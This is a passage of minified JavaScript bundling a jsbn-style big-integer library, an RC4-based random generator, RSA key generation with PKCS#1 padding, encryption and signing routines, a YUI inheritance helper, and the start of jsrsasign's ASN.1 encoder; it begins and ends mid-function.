for (var a = n + 1; a < this.t; ++a)
t[a - n - 1] |= (this[a] & i) << o,
t[a - n] = this[a] >> r;
r > 0 && (t[this.t - n - 1] |= (this.s & i) << o),
t.t = this.t - n,
t.clamp()
}
}
,
e.prototype.subTo = function(e, t) {
var n = 0
, r = 0
, o = Math.min(e.t, this.t);
while (n < o)
r += this[n] - e[n],
t[n++] = r & this.DM,
r >>= this.DB;
if (e.t < this.t) {
r -= e.s;
while (n < this.t)
r += this[n],
t[n++] = r & this.DM,
r >>= this.DB;
r += this.s
} else {
r += this.s;
while (n < e.t)
r -= e[n],
t[n++] = r & this.DM,
r >>= this.DB;
r -= e.s
}
t.s = r < 0 ? -1 : 0,
r < -1 ? t[n++] = this.DV + r : r > 0 && (t[n++] = r),
t.t = n,
t.clamp()
}
,
e.prototype.multiplyTo = function(t, n) {
var r = this.abs()
, o = t.abs()
, i = r.t;
n.t = i + o.t;
while (--i >= 0)
n[i] = 0;
for (i = 0; i < o.t; ++i)
n[i + r.t] = r.am(0, o[i], n, i, 0, r.t);
n.s = 0,
n.clamp(),
this.s != t.s && e.ZERO.subTo(n, n)
}
,
e.prototype.squareTo = function(e) {
var t = this.abs()
, n = e.t = 2 * t.t;
while (--n >= 0)
e[n] = 0;
for (n = 0; n < t.t - 1; ++n) {
var r = t.am(n, t[n], e, 2 * n, 0, 1);
(e[n + t.t] += t.am(n + 1, 2 * t[n], e, 2 * n + 1, r, t.t - n - 1)) >= t.DV && (e[n + t.t] -= t.DV,
e[n + t.t + 1] = 1)
}
e.t > 0 && (e[e.t - 1] += t.am(n, t[n], e, 2 * n, 0, 1)),
e.s = 0,
e.clamp()
}
,
e.prototype.divRemTo = function(t, n, r) {
var o = t.abs();
if (!(o.t <= 0)) {
var i = this.abs();
if (i.t < o.t)
return null != n && n.fromInt(0),
void (null != r && this.copyTo(r));
null == r && (r = R());
var a = R()
, s = this.s
, l = t.s
, c = this.DB - U(o[o.t - 1]);
c > 0 ? (o.lShiftTo(c, a),
i.lShiftTo(c, r)) : (o.copyTo(a),
i.copyTo(r));
var u = a.t
, d = a[u - 1];
if (0 != d) {
var f = d * (1 << this.F1) + (u > 1 ? a[u - 2] >> this.F2 : 0)
, h = this.FV / f
, p = (1 << this.F1) / f
, m = 1 << this.F2
, v = r.t
, g = v - u
, b = null == n ? R() : n;
a.dlShiftTo(g, b),
r.compareTo(b) >= 0 && (r[r.t++] = 1,
r.subTo(b, r)),
e.ONE.dlShiftTo(u, b),
b.subTo(a, a);
while (a.t < u)
a[a.t++] = 0;
while (--g >= 0) {
var y = r[--v] == d ? this.DM : Math.floor(r[v] * h + (r[v - 1] + m) * p);
if ((r[v] += a.am(0, y, r, g, 0, u)) < y) {
a.dlShiftTo(g, b),
r.subTo(b, r);
while (r[v] < --y)
r.subTo(b, r)
}
}
null != n && (r.drShiftTo(u, n),
s != l && e.ZERO.subTo(n, n)),
r.t = u,
r.clamp(),
c > 0 && r.rShiftTo(c, r),
s < 0 && e.ZERO.subTo(r, r)
}
}
}
,
e.prototype.invDigit = function() {
if (this.t < 1)
return 0;
var e = this[0];
if (0 == (1 & e))
return 0;
var t = 3 & e;
return t = t * (2 - (15 & e) * t) & 15,
t = t * (2 - (255 & e) * t) & 255,
t = t * (2 - ((65535 & e) * t & 65535)) & 65535,
t = t * (2 - e * t % this.DV) % this.DV,
t > 0 ? this.DV - t : -t
}
,
e.prototype.isEven = function() {
return 0 == (this.t > 0 ? 1 & this[0] : this.s)
}
,
e.prototype.exp = function(t, n) {
if (t > 4294967295 || t < 1)
return e.ONE;
var r = R()
, o = R()
, i = n.convert(this)
, a = U(t) - 1;
i.copyTo(r);
while (--a >= 0)
if (n.sqrTo(r, o),
(t & 1 << a) > 0)
n.mulTo(o, i, r);
else {
var s = r;
r = o,
o = s
}
return n.revert(r)
}
,
e.prototype.chunkSize = function(e) {
return Math.floor(Math.LN2 * this.DB / Math.log(e))
}
,
e.prototype.toRadix = function(e) {
if (null == e && (e = 10),
0 == this.signum() || e < 2 || e > 36)
return "0";
var t = this.chunkSize(e)
, n = Math.pow(e, t)
, r = W(n)
, o = R()
, i = R()
, a = "";
this.divRemTo(r, o, i);
while (o.signum() > 0)
a = (n + i.intValue()).toString(e).substr(1) + a,
o.divRemTo(r, o, i);
return i.intValue().toString(e) + a
}
,
e.prototype.fromRadix = function(t, n) {
this.fromInt(0),
null == n && (n = 10);
for (var r = this.chunkSize(n), o = Math.pow(n, r), i = !1, a = 0, s = 0, l = 0; l < t.length; ++l) {
var c = K(t, l);
c < 0 ? "-" == t.charAt(l) && 0 == this.signum() && (i = !0) : (s = n * s + c,
++a >= r && (this.dMultiply(o),
this.dAddOffset(s, 0),
a = 0,
s = 0))
}
a > 0 && (this.dMultiply(Math.pow(n, a)),
this.dAddOffset(s, 0)),
i && e.ZERO.subTo(this, this)
}
,
e.prototype.fromNumber = function(t, n, r) {
if ("number" == typeof n)
if (t < 2)
this.fromInt(1);
else {
this.fromNumber(t, r),
this.testBit(t - 1) || this.bitwiseTo(e.ONE.shiftLeft(t - 1), a, this),
this.isEven() && this.dAddOffset(1, 0);
while (!this.isProbablePrime(n))
this.dAddOffset(2, 0),
this.bitLength() > t && this.subTo(e.ONE.shiftLeft(t - 1), this)
}
else {
var o = []
, i = 7 & t;
o.length = 1 + (t >> 3),
n.nextBytes(o),
i > 0 ? o[0] &= (1 << i) - 1 : o[0] = 0,
this.fromString(o, 256)
}
}
,
e.prototype.bitwiseTo = function(e, t, n) {
var r, o, i = Math.min(e.t, this.t);
for (r = 0; r < i; ++r)
n[r] = t(this[r], e[r]);
if (e.t < this.t) {
for (o = e.s & this.DM,
r = i; r < this.t; ++r)
n[r] = t(this[r], o);
n.t = this.t
} else {
for (o = this.s & this.DM,
r = i; r < e.t; ++r)
n[r] = t(o, e[r]);
n.t = e.t
}
n.s = t(this.s, e.s),
n.clamp()
}
,
e.prototype.changeBit = function(t, n) {
var r = e.ONE.shiftLeft(t);
return this.bitwiseTo(r, n, r),
r
}
,
e.prototype.addTo = function(e, t) {
var n = 0
, r = 0
, o = Math.min(e.t, this.t);
while (n < o)
r += this[n] + e[n],
t[n++] = r & this.DM,
r >>= this.DB;
if (e.t < this.t) {
r += e.s;
while (n < this.t)
r += this[n],
t[n++] = r & this.DM,
r >>= this.DB;
r += this.s
} else {
r += this.s;
while (n < e.t)
r += e[n],
t[n++] = r & this.DM,
r >>= this.DB;
r += e.s
}
t.s = r < 0 ? -1 : 0,
r > 0 ? t[n++] = r : r < -1 && (t[n++] = this.DV + r),
t.t = n,
t.clamp()
}
,
e.prototype.dMultiply = function(e) {
this[this.t] = this.am(0, e - 1, this, 0, 0, this.t),
++this.t,
this.clamp()
}
,
e.prototype.dAddOffset = function(e, t) {
if (0 != e) {
while (this.t <= t)
this[this.t++] = 0;
this[t] += e;
while (this[t] >= this.DV)
this[t] -= this.DV,
++t >= this.t && (this[this.t++] = 0),
++this[t]
}
}
,
e.prototype.multiplyLowerTo = function(e, t, n) {
var r = Math.min(this.t + e.t, t);
n.s = 0,
n.t = r;
while (r > 0)
n[--r] = 0;
for (var o = n.t - this.t; r < o; ++r)
n[r + this.t] = this.am(0, e[r], n, r, 0, this.t);
for (o = Math.min(e.t, t); r < o; ++r)
this.am(0, e[r], n, r, 0, t - r);
n.clamp()
}
,
e.prototype.multiplyUpperTo = function(e, t, n) {
--t;
var r = n.t = this.t + e.t - t;
n.s = 0;
while (--r >= 0)
n[r] = 0;
for (r = Math.max(t - this.t, 0); r < e.t; ++r)
n[this.t + r - t] = this.am(t - r, e[r], n, 0, 0, this.t + r - t);
n.clamp(),
n.drShiftTo(1, n)
}
,
e.prototype.modInt = function(e) {
if (e <= 0)
return 0;
var t = this.DV % e
, n = this.s < 0 ? e - 1 : 0;
if (this.t > 0)
if (0 == t)
n = this[0] % e;
else
for (var r = this.t - 1; r >= 0; --r)
n = (t * n + this[r]) % e;
return n
}
,
e.prototype.millerRabin = function(t) {
var n = this.subtract(e.ONE)
, r = n.getLowestSetBit();
if (r <= 0)
return !1;
var o = n.shiftRight(r);
t = t + 1 >> 1,
t > L.length && (t = L.length);
for (var i = R(), a = 0; a < t; ++a) {
i.fromInt(L[Math.floor(Math.random() * L.length)]);
var s = i.modPow(o, this);
if (0 != s.compareTo(e.ONE) && 0 != s.compareTo(n)) {
var l = 1;
while (l++ < r && 0 != s.compareTo(n))
if (s = s.modPowInt(2, this),
0 == s.compareTo(e.ONE))
return !1;
if (0 != s.compareTo(n))
return !1
}
}
return !0
}
,
e.prototype.square = function() {
var e = R();
return this.squareTo(e),
e
}
,
e.prototype.gcda = function(e, t) {
var n = this.s < 0 ? this.negate() : this.clone()
, r = e.s < 0 ? e.negate() : e.clone();
if (n.compareTo(r) < 0) {
var o = n;
n = r,
r = o
}
var i = n.getLowestSetBit()
, a = r.getLowestSetBit();
if (a < 0)
t(n);
else {
i < a && (a = i),
a > 0 && (n.rShiftTo(a, n),
r.rShiftTo(a, r));
var s = function() {
(i = n.getLowestSetBit()) > 0 && n.rShiftTo(i, n),
(i = r.getLowestSetBit()) > 0 && r.rShiftTo(i, r),
n.compareTo(r) >= 0 ? (n.subTo(r, n),
n.rShiftTo(1, n)) : (r.subTo(n, r),
r.rShiftTo(1, r)),
n.signum() > 0 ? setTimeout(s, 0) : (a > 0 && r.lShiftTo(a, r),
setTimeout((function() {
t(r)
}
), 0))
};
setTimeout(s, 10)
}
}
,
e.prototype.fromNumberAsync = function(t, n, r, o) {
if ("number" == typeof n)
if (t < 2)
this.fromInt(1);
else {
this.fromNumber(t, r),
this.testBit(t - 1) || this.bitwiseTo(e.ONE.shiftLeft(t - 1), a, this),
this.isEven() && this.dAddOffset(1, 0);
var i = this
, s = function() {
i.dAddOffset(2, 0),
i.bitLength() > t && i.subTo(e.ONE.shiftLeft(t - 1), i),
i.isProbablePrime(n) ? setTimeout((function() {
o()
}
), 0) : setTimeout(s, 0)
};
setTimeout(s, 0)
}
else {
var l = []
, c = 7 & t;
l.length = 1 + (t >> 3),
n.nextBytes(l),
c > 0 ? l[0] &= (1 << c) - 1 : l[0] = 0,
this.fromString(l, 256)
}
}
,
e
}(), E = function() {
function e() {}
return e.prototype.convert = function(e) {
return e
}
,
e.prototype.revert = function(e) {
return e
}
,
e.prototype.mulTo = function(e, t, n) {
e.multiplyTo(t, n)
}
,
e.prototype.sqrTo = function(e, t) {
e.squareTo(t)
}
,
e
}(), A = function() {
function e(e) {
this.m = e
}
return e.prototype.convert = function(e) {
return e.s < 0 || e.compareTo(this.m) >= 0 ? e.mod(this.m) : e
}
,
e.prototype.revert = function(e) {
return e
}
,
e.prototype.reduce = function(e) {
e.divRemTo(this.m, null, e)
}
,
e.prototype.mulTo = function(e, t, n) {
e.multiplyTo(t, n),
this.reduce(n)
}
,
e.prototype.sqrTo = function(e, t) {
e.squareTo(t),
this.reduce(t)
}
,
e
}(), H = function() {
function e(e) {
this.m = e,
this.mp = e.invDigit(),
this.mpl = 32767 & this.mp,
this.mph = this.mp >> 15,
this.um = (1 << e.DB - 15) - 1,
this.mt2 = 2 * e.t
}
return e.prototype.convert = function(e) {
var t = R();
return e.abs().dlShiftTo(this.m.t, t),
t.divRemTo(this.m, null, t),
e.s < 0 && t.compareTo(D.ZERO) > 0 && this.m.subTo(t, t),
t
}
,
e.prototype.revert = function(e) {
var t = R();
return e.copyTo(t),
this.reduce(t),
t
}
,
e.prototype.reduce = function(e) {
while (e.t <= this.mt2)
e[e.t++] = 0;
for (var t = 0; t < this.m.t; ++t) {
var n = 32767 & e[t]
, r = n * this.mpl + ((n * this.mph + (e[t] >> 15) * this.mpl & this.um) << 15) & e.DM;
n = t + this.m.t,
e[n] += this.m.am(0, r, e, t, 0, this.m.t);
while (e[n] >= e.DV)
e[n] -= e.DV,
e[++n]++
}
e.clamp(),
e.drShiftTo(this.m.t, e),
e.compareTo(this.m) >= 0 && e.subTo(this.m, e)
}
,
e.prototype.mulTo = function(e, t, n) {
e.multiplyTo(t, n),
this.reduce(n)
}
,
e.prototype.sqrTo = function(e, t) {
e.squareTo(t),
this.reduce(t)
}
,
e
}(), V = function() {
function e(e) {
this.m = e,
this.r2 = R(),
this.q3 = R(),
D.ONE.dlShiftTo(2 * e.t, this.r2),
this.mu = this.r2.divide(e)
}
return e.prototype.convert = function(e) {
if (e.s < 0 || e.t > 2 * this.m.t)
return e.mod(this.m);
if (e.compareTo(this.m) < 0)
return e;
var t = R();
return e.copyTo(t),
this.reduce(t),
t
}
,
e.prototype.revert = function(e) {
return e
}
,
e.prototype.reduce = function(e) {
e.drShiftTo(this.m.t - 1, this.r2),
e.t > this.m.t + 1 && (e.t = this.m.t + 1,
e.clamp()),
this.mu.multiplyUpperTo(this.r2, this.m.t + 1, this.q3),
this.m.multiplyLowerTo(this.q3, this.m.t + 1, this.r2);
while (e.compareTo(this.r2) < 0)
e.dAddOffset(1, this.m.t + 1);
e.subTo(this.r2, e);
while (e.compareTo(this.m) >= 0)
e.subTo(this.m, e)
}
,
e.prototype.mulTo = function(e, t, n) {
e.multiplyTo(t, n),
this.reduce(n)
}
,
e.prototype.sqrTo = function(e, t) {
e.squareTo(t),
this.reduce(t)
}
,
e
}();
function R() {
return new D(null)
}
function I(e, t) {
return new D(e,t)
}
var F = "undefined" !== typeof navigator;
F && P && "Microsoft Internet Explorer" == navigator.appName ? (D.prototype.am = function(e, t, n, r, o, i) {
var a = 32767 & t
, s = t >> 15;
while (--i >= 0) {
var l = 32767 & this[e]
, c = this[e++] >> 15
, u = s * l + c * a;
l = a * l + ((32767 & u) << 15) + n[r] + (1073741823 & o),
o = (l >>> 30) + (u >>> 15) + s * c + (o >>> 30),
n[r++] = 1073741823 & l
}
return o
}
,
j = 30) : F && P && "Netscape" != navigator.appName ? (D.prototype.am = function(e, t, n, r, o, i) {
while (--i >= 0) {
var a = t * this[e++] + n[r] + o;
o = Math.floor(a / 67108864),
n[r++] = 67108863 & a
}
return o
}
,
j = 26) : (D.prototype.am = function(e, t, n, r, o, i) {
var a = 16383 & t
, s = t >> 14;
while (--i >= 0) {
var l = 16383 & this[e]
, c = this[e++] >> 14
, u = s * l + c * a;
l = a * l + ((16383 & u) << 14) + n[r] + o,
o = (l >> 28) + (u >> 14) + s * c,
n[r++] = 268435455 & l
}
return o
}
,
j = 28),
D.prototype.DB = j,
D.prototype.DM = (1 << j) - 1,
D.prototype.DV = 1 << j;
var N = 52;
D.prototype.FV = Math.pow(2, N),
D.prototype.F1 = N - j,
D.prototype.F2 = 2 * j - N;
var $, Y, B = [];
for ($ = "0".charCodeAt(0),
Y = 0; Y <= 9; ++Y)
B[$++] = Y;
for ($ = "a".charCodeAt(0),
Y = 10; Y < 36; ++Y)
B[$++] = Y;
for ($ = "A".charCodeAt(0),
Y = 10; Y < 36; ++Y)
B[$++] = Y;
function K(e, t) {
var n = B[e.charCodeAt(t)];
return null == n ? -1 : n
}
function W(e) {
var t = R();
return t.fromInt(e),
t
}
function U(e) {
var t, n = 1;
return 0 != (t = e >>> 16) && (e = t,
n += 16),
0 != (t = e >> 8) && (e = t,
n += 8),
0 != (t = e >> 4) && (e = t,
n += 4),
0 != (t = e >> 2) && (e = t,
n += 2),
0 != (t = e >> 1) && (e = t,
n += 1),
n
}
D.ZERO = W(0),
D.ONE = W(1);
var q = function() {
function e() {
this.i = 0,
this.j = 0,
this.S = []
}
return e.prototype.init = function(e) {
var t, n, r;
for (t = 0; t < 256; ++t)
this.S[t] = t;
for (n = 0,
t = 0; t < 256; ++t)
n = n + this.S[t] + e[t % e.length] & 255,
r = this.S[t],
this.S[t] = this.S[n],
this.S[n] = r;
this.i = 0,
this.j = 0
}
,
e.prototype.next = function() {
var e;
return this.i = this.i + 1 & 255,
this.j = this.j + this.S[this.i] & 255,
e = this.S[this.i],
this.S[this.i] = this.S[this.j],
this.S[this.j] = e,
this.S[e + this.S[this.i] & 255]
}
,
e
}();
function G() {
return new q
}
var X, J, Z = 256, Q = null;
if (null == Q) {
Q = [],
J = 0;
var ee = void 0;
if (window.crypto && window.crypto.getRandomValues) {
var te = new Uint32Array(256);
for (window.crypto.getRandomValues(te),
ee = 0; ee < te.length; ++ee)
Q[J++] = 255 & te[ee]
}
var ne = 0
, re = function(e) {
if (ne = ne || 0,
ne >= 256 || J >= Z)
window.removeEventListener ? window.removeEventListener("mousemove", re, !1) : window.detachEvent && window.detachEvent("onmousemove", re);
else
try {
var t = e.x + e.y;
Q[J++] = 255 & t,
ne += 1
} catch (n) {}
};
window.addEventListener ? window.addEventListener("mousemove", re, !1) : window.attachEvent && window.attachEvent("onmousemove", re)
}
function oe() {
if (null == X) {
X = G();
while (J < Z) {
var e = Math.floor(65536 * Math.random());
Q[J++] = 255 & e
}
for (X.init(Q),
J = 0; J < Q.length; ++J)
Q[J] = 0;
J = 0
}
return X.next()
}
var ie = function() {
function e() {}
return e.prototype.nextBytes = function(e) {
for (var t = 0; t < e.length; ++t)
e[t] = oe()
}
,
e
}();
function ae(e, t) {
if (t < e.length + 22)
return console.error("Message too long for RSA"),
null;
for (var n = t - e.length - 6, r = "", o = 0; o < n; o += 2)
r += "ff";
var i = "0001" + r + "00" + e;
return I(i, 16)
}
function se(e, t) {
if (t < e.length + 11)
return console.error("Message too long for RSA"),
null;
var n = []
, r = e.length - 1;
while (r >= 0 && t > 0) {
var o = e.charCodeAt(r--);
o < 128 ? n[--t] = o : o > 127 && o < 2048 ? (n[--t] = 63 & o | 128,
n[--t] = o >> 6 | 192) : (n[--t] = 63 & o | 128,
n[--t] = o >> 6 & 63 | 128,
n[--t] = o >> 12 | 224)
}
n[--t] = 0;
var i = new ie
, a = [];
while (t > 2) {
a[0] = 0;
while (0 == a[0])
i.nextBytes(a);
n[--t] = a[0]
}
return n[--t] = 2,
n[--t] = 0,
new D(n)
}
var le = function() {
function e() {
this.n = null,
this.e = 0,
this.d = null,
this.p = null,
this.q = null,
this.dmp1 = null,
this.dmq1 = null,
this.coeff = null
}
return e.prototype.doPublic = function(e) {
return e.modPowInt(this.e, this.n)
}
,
e.prototype.doPrivate = function(e) {
if (null == this.p || null == this.q)
return e.modPow(this.d, this.n);
var t = e.mod(this.p).modPow(this.dmp1, this.p)
, n = e.mod(this.q).modPow(this.dmq1, this.q);
while (t.compareTo(n) < 0)
t = t.add(this.p);
return t.subtract(n).multiply(this.coeff).mod(this.p).multiply(this.q).add(n)
}
,
e.prototype.setPublic = function(e, t) {
null != e && null != t && e.length > 0 && t.length > 0 ? (this.n = I(e, 16),
this.e = parseInt(t, 16)) : console.error("Invalid RSA public key")
}
,
e.prototype.encrypt = function(e) {
var t = this.n.bitLength() + 7 >> 3
, n = se(e, t);
if (null == n)
return null;
var r = this.doPublic(n);
if (null == r)
return null;
for (var o = r.toString(16), i = o.length, a = 0; a < 2 * t - i; a++)
o = "0" + o;
return o
}
,
e.prototype.setPrivate = function(e, t, n) {
null != e && null != t && e.length > 0 && t.length > 0 ? (this.n = I(e, 16),
this.e = parseInt(t, 16),
this.d = I(n, 16)) : console.error("Invalid RSA private key")
}
,
e.prototype.setPrivateEx = function(e, t, n, r, o, i, a, s) {
null != e && null != t && e.length > 0 && t.length > 0 ? (this.n = I(e, 16),
this.e = parseInt(t, 16),
this.d = I(n, 16),
this.p = I(r, 16),
this.q = I(o, 16),
this.dmp1 = I(i, 16),
this.dmq1 = I(a, 16),
this.coeff = I(s, 16)) : console.error("Invalid RSA private key")
}
,
e.prototype.generate = function(e, t) {
var n = new ie
, r = e >> 1;
this.e = parseInt(t, 16);
for (var o = new D(t,16); ; ) {
for (; ; )
if (this.p = new D(e - r,1,n),
0 == this.p.subtract(D.ONE).gcd(o).compareTo(D.ONE) && this.p.isProbablePrime(10))
break;
for (; ; )
if (this.q = new D(r,1,n),
0 == this.q.subtract(D.ONE).gcd(o).compareTo(D.ONE) && this.q.isProbablePrime(10))
break;
if (this.p.compareTo(this.q) <= 0) {
var i = this.p;
this.p = this.q,
this.q = i
}
var a = this.p.subtract(D.ONE)
, s = this.q.subtract(D.ONE)
, l = a.multiply(s);
if (0 == l.gcd(o).compareTo(D.ONE)) {
this.n = this.p.multiply(this.q),
this.d = o.modInverse(l),
this.dmp1 = this.d.mod(a),
this.dmq1 = this.d.mod(s),
this.coeff = this.q.modInverse(this.p);
break
}
}
}
,
e.prototype.decrypt = function(e) {
var t = I(e, 16)
, n = this.doPrivate(t);
return null == n ? null : ce(n, this.n.bitLength() + 7 >> 3)
}
,
e.prototype.generateAsync = function(e, t, n) {
var r = new ie
, o = e >> 1;
this.e = parseInt(t, 16);
var i = new D(t,16)
, a = this
, s = function() {
var t = function() {
if (a.p.compareTo(a.q) <= 0) {
var e = a.p;
a.p = a.q,
a.q = e
}
var t = a.p.subtract(D.ONE)
, r = a.q.subtract(D.ONE)
, o = t.multiply(r);
0 == o.gcd(i).compareTo(D.ONE) ? (a.n = a.p.multiply(a.q),
a.d = i.modInverse(o),
a.dmp1 = a.d.mod(t),
a.dmq1 = a.d.mod(r),
a.coeff = a.q.modInverse(a.p),
setTimeout((function() {
n()
}
), 0)) : setTimeout(s, 0)
}
, l = function() {
a.q = R(),
a.q.fromNumberAsync(o, 1, r, (function() {
a.q.subtract(D.ONE).gcda(i, (function(e) {
0 == e.compareTo(D.ONE) && a.q.isProbablePrime(10) ? setTimeout(t, 0) : setTimeout(l, 0)
}
))
}
))
}
, c = function() {
a.p = R(),
a.p.fromNumberAsync(e - o, 1, r, (function() {
a.p.subtract(D.ONE).gcda(i, (function(e) {
0 == e.compareTo(D.ONE) && a.p.isProbablePrime(10) ? setTimeout(l, 0) : setTimeout(c, 0)
}
))
}
))
};
setTimeout(c, 0)
};
setTimeout(s, 0)
}
,
e.prototype.sign = function(e, t, n) {
var r = de(n)
, o = r + t(e).toString()
, i = ae(o, this.n.bitLength() / 4);
if (null == i)
return null;
var a = this.doPrivate(i);
if (null == a)
return null;
var s = a.toString(16);
return 0 == (1 & s.length) ? s : "0" + s
}
,
e.prototype.verify = function(e, t, n) {
var r = I(t, 16)
, o = this.doPublic(r);
if (null == o)
return null;
var i = o.toString(16).replace(/^1f+00/, "")
, a = fe(i);
return a == n(e).toString()
}
,
e
}();
function ce(e, t) {
var n = e.toByteArray()
, r = 0;
while (r < n.length && 0 == n[r])
++r;
if (n.length - r != t - 1 || 2 != n[r])
return null;
++r;
while (0 != n[r])
if (++r >= n.length)
return null;
var o = "";
while (++r < n.length) {
var i = 255 & n[r];
i < 128 ? o += String.fromCharCode(i) : i > 191 && i < 224 ? (o += String.fromCharCode((31 & i) << 6 | 63 & n[r + 1]),
++r) : (o += String.fromCharCode((15 & i) << 12 | (63 & n[r + 1]) << 6 | 63 & n[r + 2]),
r += 2)
}
return o
}
var ue = {
md2: "3020300c06082a864886f70d020205000410",
md5: "3020300c06082a864886f70d020505000410",
sha1: "3021300906052b0e03021a05000414",
sha224: "302d300d06096086480165030402040500041c",
sha256: "3031300d060960864801650304020105000420",
sha384: "3041300d060960864801650304020205000430",
sha512: "3051300d060960864801650304020305000440",
ripemd160: "3021300906052b2403020105000414"
};
function de(e) {
return ue[e] || ""
}
function fe(e) {
for (var t in ue)
if (ue.hasOwnProperty(t)) {
var n = ue[t]
, r = n.length;
if (e.substr(0, r) == n)
return e.substr(r)
}
return e
}
/*!
Copyright (c) 2011, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.9.0
*/
var he = {};
he.lang = {
extend: function(e, t, n) {
if (!t || !e)
throw new Error("YAHOO.lang.extend failed, please check that all dependencies are included.");
var r = function() {};
if (r.prototype = t.prototype,
e.prototype = new r,
e.prototype.constructor = e,
e.superclass = t.prototype,
t.prototype.constructor == Object.prototype.constructor && (t.prototype.constructor = t),
n) {
var o;
for (o in n)
e.prototype[o] = n[o];
var i = function() {}
, a = ["toString", "valueOf"];
try {
/MSIE/.test(navigator.userAgent) && (i = function(e, t) {
for (o = 0; o < a.length; o += 1) {
var n = a[o]
, r = t[n];
"function" === typeof r && r != Object.prototype[n] && (e[n] = r)
}
}
)
} catch (s) {}
i(e.prototype, n)
}
}
};
/**
* @fileOverview
* @name asn1-1.0.js
* @author Kenji Urushima kenji.urushima@gmail.com
* @version asn1 1.0.13 (2017-Jun-02)
* @since jsrsasign 2.1
* @license <a href="https://kjur.github.io/jsrsasign/license/">MIT License</a>
*/
var pe = {};
"undefined" != typeof pe.asn1 && pe.asn1 || (pe.asn1 = {}),
pe.asn1.ASN1Util = new function() {
this.integerToByteHex = function(e) {
var t = e.toString(16);
return t.length % 2 == 1 && (t = "0" + t),
t
}
,
this.bigIntToMinTwosComplementsHex = function(e) {
var t = e.toString(16);
if ("-" != t.substr(0, 1))
t.length % 2 == 1 ? t = "0" + t : t.match(/^[0-7]/) || (t = "00" + t);
else {
var n = t.substr(1)
, r = n.length;
r % 2 == 1 ? r += 1 : t.match(/^[0-7]/) || (r += 2);
for (var o = "", i = 0; i < r; i++)
o += "f";
var a = new D(o,16)
, s = a.xor(e).add(D.ONE);
t = s.toString(16).replace(/^-/, "")
}
return t
}
,
this.getPEMStringFromHex = function(e, t) {
return hextopem(e, t)
}
,
this.newObject = function(e) {
var t = pe
, n = t.asn1
, r = n.DERBoolean
, o = n.DERInteger
, i = n.DERBitString
, a = n.DEROctetString
, s = n.DERNull
, l = n.DERObjectIdentifier
, c = n.DEREnumerated
, u = n.DERUTF8String
, d = n.DERNumericString
, f = n.DERPrintableString
, h = n.DERTeletexString
, p = n.DERIA5String
, m = n.DERUTCTime
, v = n.DERGeneralizedTime
, g = n.DERSequence
, b = n.DERSet
, y = n.DERTaggedObject
, _ = n.ASN1Util.newObject
, x = Object.keys(e);
if (1 != x.length)
throw "key of param shall be only one.";
var w = x[0];
if (-1 == ":bool:int:bitstr:octstr:null:oid:enum:utf8str:numstr:prnstr:telstr:ia5str:utctime:gentime:seq:set:tag:".indexOf(":" + w + ":"))
throw "undefined key: " + w;
if ("bool" == w)
return new r(e[w]);
if ("int" == w)
return new o(e[w]);
if ("bitstr" == w)
return new i(e[w]);
if ("octstr" == w)
return new a(e[w]);
if ("null" == w)
return new s(e[w]);
if ("oid" == w)
return new l(e[w]);
if ("enum" == w)
return new c(e[w]);
if ("utf8str" == w)
return new u(e[w]);
if ("numstr" == w)
return new d(e[w]);
if ("prnstr" == w)
return new f(e[w]);
if ("telstr" == w)
return new h(e[w]);
if ("ia5str" == w)
return new p(e[w]);
if ("utctime" == w)
return new m(e[w]);
if ("gentime" == w)
return new v(e[w]);
if ("seq" == w) {
for (var C = e[w], S = [], j = 0; j < C.length; j++) {
var k = _(C[j]);
S.push(k)
}
return new g({
array: S
})
}
if ("set" == w) {
for (C = e[w],
S = [],
j = 0; j < C.length; j++) {
k = _(C[j]);
S.push(k)
}
return new b({
array: S
})
}
if ("tag" == w) {
var O = e[w];
if ("[object Array]" === Object.prototype.toString.call(O) && 3 == O.length) {
var M = _(O[2]);
return new y({
tag: O[0],
explicit: O[1],
obj: M
})
}
var T = {};
if (void 0 !== O.explicit && (T.explicit = O.explicit),
void 0 !== O.tag && (T.tag = O.tag),
void 0 === O.obj)
throw "obj shall be specified for 'tag'.";
return T.obj = _(O.obj),
new y(T)
}
}
,
this.jsonToASN1HEX = function(e) {
var t = this.newObject(e);
return t.getEncodedHex()
}
}
,
pe.asn1.ASN1Util.oidHexToInt = function(e) {
for (var t = "", n = parseInt(e.substr(0, 2), 16), r = Math.floor(n / 40), o = n % 40, i = (t = r + "." + o,
""), a = 2; a < e.length; a += 2) {
var s = parseInt(e.substr(a, 2), 16)
, l = ("00000000" + s.toString(2)).slice(-8);
if (i += l.substr(1, 7),
"0" == l.substr(0, 1)) {
var c = new D(i,2);
t = t + "." + c.toString(10),
i = ""
}
}
return t
}
,
pe.asn1.ASN1Util.oidIntToHex = function(e) {
var t = function(e) {
var t = e.toString(16);
return 1 == t.length && (t = "0" + t),
t
}
, n = function(e) {
var n = ""
, r = new D(e,10)
, o = r.toString(2)
, i = 7 - o.length % 7;
7 == i && (i = 0);
for (var a = "", s = 0; s < i; s++)
a += "0";
o = a + o;
for (s = 0; s < o.length - 1; s += 7) {
var l = o.substr(s, 7);
s != o.length - 7 && (l = "1" + l),
n += t(parseInt(l, 2))
}
return n
};
if (!e.match(/^[0-9.]+$/))
throw "malformed oid string: " + e;
var r = ""
, o = e.split(".")
, i = 40 * parseInt(o[0]) + parseInt(o[1]);
r += t(i),
o.splice(0, 2);
for (var a = 0; a < o.length; a++)
r += n(o[a]);
return r
}
,
pe.asn1.ASN1Object = function() {
var e = "";
this.getLengthHexFromValue = function() {
if ("undefined" == typeof this.hV || null == this.hV)
throw "this.hV is null or undefined.";
if (this.hV.length % 2 == 1)
throw "value hex must be even length: n=" + e.length + ",v=" + this.hV;
var t = this.hV.length / 2
, n = t.toString(16);
if (n.length % 2 == 1 && (n = "0" + n),
t < 128)
return n;
var r = n.length / 2;
if (r > 15)
throw "ASN.1 length too long to represent by 8x: n = " + t.toString(16);
var o = 128 + r;
return o.toString(16) + n
}
,
this.getEncodedHex = function() {
return (null == this.hTLV || this.isModified) && (this.hV = this.getFreshValueHex(),
this.hL = this.getLengthHexFromValue(),
this.hTLV = this.hT + this.hL + this.hV,
this.isModified = !1),
this.hTLV
}
,
this.getValueHex = function() {
return this.getEncodedHex(),
this.hV
}
,
this.getFreshValueHex = function() {
return ""
}
}
,
pe.asn1.DERAbstractString = function(e) {
pe.asn1.DERAbstractString.superclass.constructor.call(this);
this.getString = function() {
return this.s
}
,
this.setString = function(e) {
this.hTLV = null,
this.isModified = !0,
this.s = e,
this.hV = stohex(this.s)
}
,
this.setStringHex = function(e) {
this.hTLV = null,
this.isModified = !0,
